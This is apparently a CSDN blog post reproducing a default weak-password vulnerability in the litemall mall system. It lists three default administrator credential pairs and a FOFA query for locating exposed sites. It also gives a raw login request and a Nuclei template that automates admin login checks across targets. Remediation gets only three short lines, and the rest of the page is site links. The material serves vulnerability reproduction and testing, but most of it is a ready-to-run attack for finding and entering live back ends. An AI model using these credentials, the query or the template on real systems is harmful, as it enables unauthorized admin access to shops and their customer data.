litemall系统默认弱口令漏洞

于 2024-02-20 10:07:13 发布
阅读量716 收藏 10
点赞数 17
分类专栏: 漏洞复现 文章标签: 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136183504
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

litemall是一个简单的商场系统,包含小程序客户端、移动客户端和网页管理端。技术采用Spring Boot后端 + Vue管理员前端 + 微信小程序用户前端 + Vue用户移动端。

litemall 20220508存在多个默认口令,攻击者可通过此漏洞进入后台。

默认密码

超级管理员用户名: admin123 超级管理员密码:admin123
商城管理员用户名: mall123 商城管理员密码:mall123
推广管理员用户名: promotion123 推广管理员密码:promotion123

Ⅱ、fofa语句

title="litemall"

Ⅲ、漏洞复现

POC

POST /admin/auth/login HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 42
sec-ch-ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

{"username":"admin123","password":"admin123"}

1、构建poc

2、超级管理员登录

3、商城管理员登录

4、推广管理员登录

Ⅳ、Nuclei-POC

id: litemall

info:
  name: litemall 20220508存在多个默认口令,攻击者可通过此漏洞进入后台。
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="litemall"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /admin/auth/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Length: 42
        sec-ch-ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
        Accept: application/json, text/plain, */*
        Content-Type: application/json;charset=UTF-8
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
        sec-ch-ua-platform: "Windows"
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

        {"username":"admin123","password":"admin123"}


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"admin123","成功")

Ⅴ、修复建议

1、请联系厂商进行修复;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

Love Seed
关注
  • 17
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
github中litemall项目学习(一) 将项目在本地运行
m0_47221240的博客
02-11 829
litemall项目本地跑通,core-js问题
安全产品系统、设备默认口令清单弱口令、密码
03-01
安全产品系统、设备默认口令清单,国内防火墙默认密码,华为产品弱口令
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。 重要提示: 请确保您的 FTP 服务软件为官方最新版本。同
litemall小商场系统-其他
06-12
litemall是一个小商场系统。相当于 Spring Boot后端 + Vue管理员前端 + 微信小程序用户前端 + Vue用户移动端。 功能: 小商城功能 1、首页 2、专题列表、专题详情 3、分类列表、分类详情 4、品牌列表、品牌详情 5、新品首发、人气推荐 6、优惠券列表、优惠券选择 7、团购 8、搜索 9、商品详情、商品评价、商品分享 10、购物车 11、下单 12、订单列表、订单详情、订单售后 13、地址、收藏、足迹、意见反馈 14、客服 管理平台功能 1、会员管理 2、商城管理 3、商品管理 4、推广管理 5、系统管理 6、配置管理 7、统计报表 快速启动 1、配置最小开发环境: MySQL JDK1.8或以上 Maven Nodejs 微信开发者工具 2、数据库依次导入litemall-db/sql下的数据库文件 litemall_schema.sql litemall_table.sql litemall_data.sql 3、启动小商场和管理后台的后端服务 打开命令行,输入以下命令 cd litemall mvn install mvn clean package java -Dfile.encoding=UTF-8 -jar litemall-all/target/litemall-all-0.1.0-exec.jar 4、启动管理后台前端 打开命令行,输入以下命令 npm install -g cnpm --registry=https://registry.npm.taobao.org cd litemall/litemall-admin cnpm install cnpm run dev 此时,浏览器打开,输入网址http://localhost:9527, 此时进入管理后台登录页面。 5、启动小商城前端 这里存在两套小商场前端litemall-wx和renard-wx,开发者可以分别导入和测试: 微信开发工具导入litemall-wx项目; 项目配置,启用“不校验合法域名、web-view(业务域名)、TLS 版本以及 HTTPS 证书” 点击“编译”,即可在微信开发工具预览效果; 也可以点击“预览”,然后手机扫描登录(但是手机需开启调试功能)。 注意: 这里只是最简启动方式,而小商场的微信登录、微信支付等功能需开发者设置才能运行, 更详细方案请参考文档。 6、启动轻商城前端 打开命令行,输入以下命令 npm install -g cnpm --registry=https://registry.npm.taobao.org cd litemall/litemall-vue cnpm install cnpm run dev 此时,浏览器(建议采用chrome 手机模式)打开,输入网址http://localhost:6255, 此时进入轻商场。 注意: 现在功能很不稳定,处在开发阶段。
记录第一个我自己部署的开源项目--litemall商城
m0_74311500的博客
10-26 853
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
记录部署开源项目Litemall商城的步骤及遇到的问题和解决方法
qq_35227352的博客
03-01 3402
1. 在Navicat中导入给定的sql文件,建立起对应的数据库 可直接在Navicat中直接右键运行sql文件,但是遇到了两个问题: ①提示文件sql语句中有语法错误:Error:your MySQL server version for the right syntax to use near ')'at line 1,提示的位置是进行用户创建时发生错误 解决方法是打开sql文件复制sql语句注释掉直接运行 drop database if exists litemall; -- drop user
Litemall性能测试实战_00前言
qq_33271275的博客
02-12 168
做性能测试实战过程中的一些简要的心得体会
redis的弱口令漏洞环境
01-26
docker-compose.yml
SexyBeast233#SecBooks#Alibaba Nacos 控制台默认弱口令1
07-25
Alibaba Nacos 控制台默认弱口令漏洞描述Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息漏洞影响漏洞
Litemall性能测试实战_01搭建环境
qq_33271275的博客
02-12 799
Litemall性能测试实战_01搭建环境
java版商城源码下载-litemall:电商系统操作
06-05
java版商城源码下载 litemall 又一个小商场系统。 litemall = Spring Boot后端 + Vue管理员前端 + 微信小程序用户前端 + Vue用户移动端 项目实例 小商场实例 renard-wx模块实例 注意:此实例是真实小商场,开发者可以购买商品和付款,但请不要尝试退款操作。 litemall-wx模块实例 注意:此实例是测试小商场,开发者请不要尝试购买商品、付款、退款操作。 轻商场实例 请手机扫描以下二维码访问: 或者浏览器采用手机模式访问以下网址: 注意: 由于第一次加载数据量较大,建议wifi网络访问,且耐心等待数秒。 此实例是测试轻商场,不支持支付,而且处于开发中还不完善。 管理后台实例 浏览器打开,输入以下网址: 管理员用户名admin123,管理员密码admin123 注意:此实例只是测试管理后台,不是前两个小商城的管理后台。 项目代码 项目架构 技术栈 Spring Boot Vue 微信小程序 功能 小商城功能 首页 专题列表、专题详情 分类列表、分类详情 品牌列表、品牌详情 新品首发、人气推荐 优惠券列表、优惠券选择 团购(团购业务有待完善
Litemall性能测试实战_02需求分析
qq_33271275的博客
02-12 279
Litemall性能测试实战_02需求分析
【复现】litemall商场系统后台弱口令漏洞_47
最新发布
fushuang333的博客
02-12 491
【复现】litemall商场系统后台弱口令漏洞弱口令漏洞可以登进后台,可能会对功能造成影响,或者对其他功能破坏
github中litemall项目学习(二) Mybatis学习()
m0_47221240的博客
02-17 489
mybatis学习
Debug | Litemall项目上线
憨憨李四的博客
05-22 429
这里是因为SQL初始化错误,虚拟机没有权限 来连接数据库。参考数据导入那得问题解决。这里最好用nvm来管理node版本,nvm用yum软件库来安装。此次debug是在这个版本下进行的项目上线,最好用这个版本。版本很重要,不然会出现各个软硬件之间的版本不兼容问题。
Litemall项目——商品模块之数据表设计
loongkingwhat的博客
03-23 682
一、背景说明 商品模块中绕不开SKU(Stock Keeping Unit,库存量单位)和SPU(Standard Product Unit,标准化产品单元)。 更通俗的来说,SPU就是淘宝里的通用标题,SKU是通过某些属性确定的某一款商品。例如“AJ1男子运动鞋复古 DD6834”就是SPU,这个SPU下有很多的SKU,包括“橙色 44.5码”,“橙色 45码”,“橙色 46码”,“橙色 47.5码”等。 二、表结构 1 商品信息表(SPU表) CREATE TABLE `litemall_goods`
mall改造:litemall与mall对比,开源项目不要误导新手了
程序员XW
07-10 3935
开源项目mall 项目中,只提供了后台的mall-admin-web 的后台管理的前端页面,既然要很具mall做自己的开源项目,所以商场的前端是不可获取的,mall的商场前端一直在说开发中,一年了,等不及了,自己开始动手吧。 本来是mall项目改造,但是在网上突然找到一个项目,值得推荐一下,作者的用心程度要给100分的。这个项目就是litemall,这里就不放具体链接了,大家自行去码云或者github搜索吧。 先说下两个项目的区别。 mall,大家可以看到,相对的跟新频率不是很高,项目记得在19年的时
你必不可能错过的java开源商城项目
Gang-bb的博客
11-22 5388
文章目录1. mall-swarm2. mall3. litemall4. Mall4j电商商城 java商城系统 1. mall-swarm github:https://github.com/macrozheng/mall-swarm mall-swarm是一套微服务商城系统,采用了 Spring Cloud Hoxton & Alibaba、Spring Boot 2.3、Oauth2、MyBatis、Docker、Elasticsearch等核心技术,同时提供了基于Vue的管理后台方便快速搭
WEB弱口令漏洞的危害
06-09
WEB弱口令漏洞的危害是非常严重的,因为攻击者可以通过暴力破解或字典攻击等方式轻松地获取用户的密码,从而获得对用户账户的访问权限。以下是WEB弱口令漏洞可能带来的危害: 1. 数据泄露:攻击者可以通过获取用户密码,进而访问用户的个人信息、银行账户、信用卡信息、工作文件等,导致用户的个人隐私泄露。 2. 系统崩溃:攻击者通过WEB弱口令漏洞可以访问系统内部的敏感信息,甚至可以篡改系统内部数据,导致系统崩溃,影响正常的业务运行。 3. 网站声誉受损:WEB弱口令漏洞的出现将会影响网站的声誉,使得用户失去对网站的信任,从而在一定程度上影响网站的经营和发展。 因此,为了保障用户的信息安全和网站的安全,网站管理员应该加强对WEB弱口令漏洞的防范和治理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值